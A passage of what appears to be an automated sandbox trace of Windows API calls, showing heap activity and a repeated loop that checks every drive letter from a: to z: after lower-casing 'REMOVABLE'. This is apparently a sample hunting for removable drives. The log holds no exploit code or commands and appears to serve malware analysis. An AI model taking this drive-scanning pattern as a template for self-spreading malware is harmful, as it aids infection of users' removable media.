hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0206.390] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.390] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.390] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.391] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.391] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.391] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.391] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.391] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.391] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.391] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.391] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.391] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.391] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.392] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.393] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.393] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.393] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.393] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.394] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.395] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.395] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.395] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.395] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.395] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.396] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.396] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.396] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0206.396] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.396] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0206.397] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0206.397] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.397] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0206.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.397] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.397] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0206.397] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.397] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.397] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.397] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.397] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.398] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.398] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.430] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.430] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.430] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.431] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.432] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.433] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.433] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.433] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.433] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.434] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.434] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.434] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0206.435] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.435] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0206.435] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0206.435] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0206.435] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.436] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0206.436] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.436] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0206.436] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.436] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.436] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.437] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.437] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.437] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.437] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.437] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.437] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.438] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.438] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.438] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.438] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.438] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.439] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.439] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.439] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.439] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.439] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.440] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.441] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.441] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.441] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.441] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.441] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.442] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.442] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0206.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.443] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0206.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0206.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0206.444] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0206.444] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0206.444] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.444] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0206.445] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0206.445] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.445] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0206.445] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0206.446] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.446] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.446] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.446] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.446] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.446] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.446] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.447] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.447] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.447] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.447] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.447] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.448] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.448] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.448] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.448] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.448] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.449] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.449] 